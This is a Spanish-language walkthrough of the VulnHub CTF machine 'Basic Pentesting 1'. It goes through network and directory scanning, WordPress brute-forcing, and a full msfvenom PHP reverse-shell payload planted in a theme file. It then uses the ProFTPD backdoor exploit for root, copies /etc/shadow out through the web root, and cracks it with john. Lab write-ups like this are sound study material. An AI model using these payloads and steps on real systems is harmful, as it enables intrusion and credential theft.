El domingo por la tarde estaba
aburrido, y se me ocurrió hacer un ctf sencillito y rápido de
vulnhub. En este caso fue csec, Basic Pentesting 1. Aunque en
realidad, tardé un poquito más de una hora. Os lo podéis descargar
de aquí:
https://www.vulnhub.com/entry/basic-pentesting-1,216/
La IP de la máquina atacante será
192.168.1.56.
En primer lugar, escaneamos la red
entera
nmap -sS -sV -O 192.168.1.0/24
Nmap scan report for vtcsec.home
(192.168.1.85)
Host is up (0.00057s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2
Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd
2.4.18 ((Ubuntu))
MAC Address: 08:00:27:AD:0D:CB (Oracle
VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3
cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE:
cpe:/o:linux:linux_kernel
Bien, ya hemos descubierto que la IP de
nuestra víctima es 192.168.1.87.
Entramos en la página web
Hacemos un escaneo de directorios
dirb http://192.168.1.85 -o dirb
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb
START_TIME: Sun Feb 16 18:37:29 2020
URL_BASE: http://192.168.1.85/
WORDLIST_FILES:
/usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.85/
----
+ http://192.168.1.85/index.html
(CODE:200|SIZE:177)
==> DIRECTORY:
http://192.168.1.85/secret/
+ http://192.168.1.85/server-status
(CODE:403|SIZE:300)
---- Entering directory:
http://192.168.1.85/secret/ ----
+ http://192.168.1.85/secret/index.php
(CODE:301|SIZE:0)
==> DIRECTORY:
http://192.168.1.85/secret/wp-admin/
==> DIRECTORY:
http://192.168.1.85/secret/wp-content/
==> DIRECTORY:
http://192.168.1.85/secret/wp-includes/
+ http://192.168.1.85/secret/xmlrpc.php
(CODE:405|SIZE:42)
---- Entering directory:
http://192.168.1.85/secret/wp-admin/ ----
+
http://192.168.1.85/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY:
http://192.168.1.85/secret/wp-admin/css/
==> DIRECTORY:
http://192.168.1.85/secret/wp-admin/images/
==> DIRECTORY:
http://192.168.1.85/secret/wp-admin/includes/
+
http://192.168.1.85/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY:
http://192.168.1.85/secret/wp-admin/js/
==> DIRECTORY:
http://192.168.1.85/secret/wp-admin/maint/
==> DIRECTORY:
http://192.168.1.85/secret/wp-admin/network/
==> DIRECTORY:
http://192.168.1.85/secret/wp-admin/user/
---- Entering directory:
http://192.168.1.85/secret/wp-content/ ----
+
http://192.168.1.85/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY:
http://192.168.1.85/secret/wp-content/plugins/
==> DIRECTORY:
http://192.168.1.85/secret/wp-content/themes/
---- Entering directory:
http://192.168.1.85/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No
need to scan it.
(Use mode '-w' if you want to scan
it anyway)
---- Entering directory:
http://192.168.1.85/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No
need to scan it.
(Use mode '-w' if you want to scan
it anyway)
---- Entering directory:
http://192.168.1.85/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No
need to scan it.
(Use mode '-w' if you want to scan
it anyway)
---- Entering directory:
http://192.168.1.85/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No
need to scan it.
(Use mode '-w' if you want to scan
it anyway)
---- Entering directory:
http://192.168.1.85/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No
need to scan it.
(Use mode '-w' if you want to scan
it anyway)
---- Entering directory:
http://192.168.1.85/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No
need to scan it.
(Use mode '-w' if you want to scan
it anyway)
---- Entering directory:
http://192.168.1.85/secret/wp-admin/network/ ----
+
http://192.168.1.85/secret/wp-admin/network/admin.php
(CODE:302|SIZE:0)
+
http://192.168.1.85/secret/wp-admin/network/index.php
(CODE:302|SIZE:0)
---- Entering directory:
http://192.168.1.85/secret/wp-admin/user/ ----
+
http://192.168.1.85/secret/wp-admin/user/admin.php
(CODE:503|SIZE:288)
+
http://192.168.1.85/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory:
http://192.168.1.85/secret/wp-content/plugins/ ----
+
http://192.168.1.85/secret/wp-content/plugins/index.php
(CODE:200|SIZE:0)
---- Entering directory:
http://192.168.1.85/secret/wp-content/themes/ ----
+
http://192.168.1.85/secret/wp-content/themes/index.php
(CODE:200|SIZE:0)
-----------------
END_TIME: Sun Feb 16 18:37:57 2020
DOWNLOADED: 36896 - FOUND: 13
En el subdirectorio secret tenemos un
blog
Según los subdirectorios, tenemos que
este blog está realizado en wordpress. Por tanto, vamos a ver sus
vulnerabilidades.
wpscan --url http://192.168.1.85/secret
--enumerate u --output wpscan1
Obtenemos la siguiente salida:
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___
___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ /
__|/ _` | '_ \
\ /\ / | | ____) |
(__| (_| | | | |
\/ \/ |_| |_____/
\___|\__,_|_| |_|
WordPress Security Scanner by
the WPScan Team
Version 3.7.5
@_WPScan_, @ethicalhack3r,
@erwan_lr, @_FireFart_
_______________________________________________________________
#[34m[i]#[0m Updating the Database ...
#[34m[i]#[0m Update completed.
#[32m[+]#[0m URL:
http://192.168.1.85/secret/
#[32m[+]#[0m Started: Sun Feb 16
18:43:21 2020
Interesting Finding(s):
#[32m[+]#[0m
http://192.168.1.85/secret/
| Interesting Entry: Server:
Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive
Detection)
| Confidence: 100%
#[32m[+]#[0m
http://192.168.1.85/secret/xmlrpc.php
| Found By: Direct Access (Aggressive
Detection)
| Confidence: 100%
| References:
| -
http://codex.wordpress.org/XML-RPC_Pingback_API
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| -
https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
#[32m[+]#[0m
http://192.168.1.85/secret/readme.html
| Found By: Direct Access (Aggressive
Detection)
| Confidence: 100%
#[32m[+]#[0m Upload directory has
listing enabled: http://192.168.1.85/secret/wp-content/uploads/
| Found By: Direct Access (Aggressive
Detection)
| Confidence: 100%
#[32m[+]#[0m
http://192.168.1.85/secret/wp-cron.php
| Found By: Direct Access (Aggressive
Detection)
| Confidence: 60%
| References:
| -
https://www.iplocation.net/defend-wordpress-from-ddos
| -
https://github.com/wpscanteam/wpscan/issues/1299
#[32m[+]#[0m WordPress version 4.9.13
identified (Latest, released on 2019-12-12).
| Found By: Emoji Settings (Passive
Detection)
| - http://192.168.1.85/secret/,
Match: '-release.min.js?ver=4.9.13'
| Confirmed By: Meta Generator
(Passive Detection)
| - http://192.168.1.85/secret/,
Match: 'WordPress 4.9.13'
#[34m[i]#[0m The main theme could not
be detected.
#[34m[i]#[0m User(s) Identified:
#[32m[+]#[0m admin
| Found By: Author Id Brute Forcing -
Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages
(Aggressive Detection)
#[33m[!]#[0m No WPVulnDB API Token
given, as a result vulnerability data has not been output.
#[33m[!]#[0m You can get a free API
token with 50 daily requests by registering at
https://wpvulndb.com/users/sign_up.
#[32m[+]#[0m Finished: Sun Feb 16
18:43:23 2020
#[32m[+]#[0m Requests Done: 61
#[32m[+]#[0m Cached Requests: 5
#[32m[+]#[0m Data Sent: 12.369 KB
#[32m[+]#[0m Data Received: 14.531 MB
#[32m[+]#[0m Memory used: 100.761 MB
#[32m[+]#[0m Elapsed time: 00:00:02
Vemos que hay un usuario admin.
Creamos un archivo con los usuarios
encontrados, en este caso uno, admin:
echo admin > admin.txt
Realizamos un ataque a fuerza bruta
wpscan --url http://192.168.1.85/secret
--usernames admin.txt --passwords
/usr/share/wordlists/metasploit/unix_passwords.txt
[…]
+] Performing password attack on Wp
Login against 1 user/s
Trying admin / admin Time: 00:00:00
<=============> (5 / 5) 100.00% Time: 00:00:00
[SUCCESS] - admin / admin
[…]
Bien, la contraseña es admin.
Nos vamos al directorio de
administración
Ingresamos el usuario y la contraseña,
admin y admin
Nos vamos a Appearance → Themes →
Editor y seleccionamos index.php
Bien, vamos a crear una reverse shell
en php
msfvenom -p php/meterpreter/reverse_tcp
LHOST=192.168.1.56 LPORT=3333 -f raw > shell.php
Bien, editamos el archivo generado
dejándolo tal cual se muestra:
/**/ error_reporting(0); $ip =
'192.168.1.56'; $port = 3333; if (($f = 'stream_socket_client') &&
is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type
= 'stream'; } if (!$s && ($f = 'fsockopen') &&
is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s
&& ($f = 'socket_create') && is_callable($f)) { $s =
$f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip,
$port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) {
die('no socket funcs'); } if (!$s) { die('no socket'); } switch
($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket':
$len = socket_read($s, 4); break; } if (!$len) { die(); } $a =
unpack("Nlen", $len); $len = $a['len']; $b = ''; while
(strlen($b) < $len) { switch ($s_type) { case 'stream': $b .=
fread($s, $len-strlen($b)); break; case 'socket': $b .=
socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] =
$s; $GLOBALS['msgsock_type'] = $s_type; if
(extension_loaded('suhosin') &&
ini_get('suhosin.executor.disable_eval')) {
$suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else {
eval($b); } die();
Llevamos este código a index.php
Pulsamos el botón Update File
Ponemos en marcha metasploit
msfconsole
Escribimos las opciones:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set
PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD =>
php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set
LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > set
LPORT 3333
LPORT => 3333
msf5 exploit(multi/handler) > set
ExitOnSession False
ExitOnSession => false
msf5 exploit(multi/handler) >
exploit -j -z
[*] Exploit running as background job
0.
[*] Exploit completed, but no session
was created.
[*] Started reverse TCP handler on
0.0.0.0:3333
msf5 exploit(multi/handler) >
En otra pestaña del navegador ponemos:
Y en nuestra ventana de metasploit
ocurre lo siguiente:
Ya estamos dentro.
Abriremos una shell
meterpreter > shell
Process 1408 created.
Channel 0 created.
Miramos a ver quiénes somos
whoami
www-data
Por tanto, somos el usuario www-data.
Veamos qué versión de GNU/Linux
tenemos
uname -r
4.10.0-28-generic
cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu
16.04.3 LTS"
si nos vamos al directorio /home
obtenemos una carpeta llamada marlinspike, por lo que va a ser un
usuario.
De hecho, tenemos permiso para ver lo
que hay dentro:
ls
046e85f6fe460de94fd46198feef4d07-backdoored_proftpd-1.3.3c.tar.gz
046e85f6fe460de94fd46198feef4d07-backdoored_proftpd-1.3.3c.tar.gz.bak
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backdoored_proftpd-1.3.3c
examples.desktop
latest.tar.gz
proftpd-1.3.3c
proftpd-1.3.3c.tar.bz2
proftpd-1.3.3c.tar.bz2.bak
wordpress
Observamos proftpd-1.3.3c, esta es una
versión del servidor ftp la cual fué infectada con una puerta
trasera. Podremos descargar el exploit y usarlo, pero en nuestro
caso, usaremos el módulo de metasploit. Para ello, saldremos de la
shell.
Exit
meterpreter >
Usamos background para volver a
metasploit.
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > use
exploit/unix/ftp/proftpd_133c_backdoor
msf5
exploit(unix/ftp/proftpd_133c_backdoor) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
msf5
exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options
(exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required
Description
---- --------------- --------
-----------
RHOSTS yes
The target host(s), range CIDR identifier, or hosts file with syntax
'file:<path>'
RPORT 21 yes
The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf5
exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.1.85
RHOSTS => 192.168.1.85
msf5
exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler
on 192.168.1.56:4444
[*] 192.168.1.85:21 - Sending Backdoor
Command
[*] Accepted the first client
connection...
[*] Accepted the second client
connection...
[*] Command: echo 7zz0sztruywJukhx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "7zz0sztruywJukhx\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened
(192.168.1.56:4444 -> 192.168.1.85:44476) at 2020-02-17 11:53:03
+0100
whoami
root
Pues ya somos administradores del
sistema.
Vamos a intentar conseguir las
contraseñas de los usuarios
mkdir /var/www/html/secret/passwords
cp /etc/passwd*
/var/www/html/secret/passwords
cp /etc/shadow
/var/www/html/secret/passwords
cd /var/www/html/secret/passwords
tar cvfz passwords.tar.gz *
passwd
passwd-
shadow
En otra terminal:
Descargamos los archivos
Descomprimimos
tar xvfz passwords.tar.gz
Craquearemos ahora la contraseña:
root@kali:~/csec# john shadow
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt,
crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for
all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost
any other key for status
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2020-02-17
12:28) 3.571g/s 28.57p/s 28.57c/s 28.57C/s marlinspike..marlin
Use the "--show" option to
display all of the cracked passwords reliably
Session completed
Como veíamos en la salida de nmap,
también tenemos un servidor ssh corriendo, así que podremos acceder
desde allí
root@kali:~/csec# ssh
marlinspike@192.168.1.85
marlinspike@192.168.1.85's password:
Welcome to Ubuntu 16.04.3 LTS
(GNU/Linux 4.10.0-28-generic x86_64)
* Documentation:
https://help.ubuntu.com
* Management:
https://landscape.canonical.com
* Support:
https://ubuntu.com/advantage
608 packages can be updated.
445 updates are security updates.
The programs included with the Ubuntu
system are free software;
the exact distribution terms for each
program are described in the
individual files in
/usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO
WARRANTY, to the extent permitted by
applicable law.
marlinspike@vtcsec:~$
Ahora, vamos a activar la cuenta root
de ubuntu, para ello, usaremos sudo -i, y nos pedirá la contraseña
que queramos para el usuario root:
marlinspike@vtcsec:~/Documents$ sudo -i
[sudo] password for marlinspike:
root@vtcsec:~#
Y ya hemos acabado.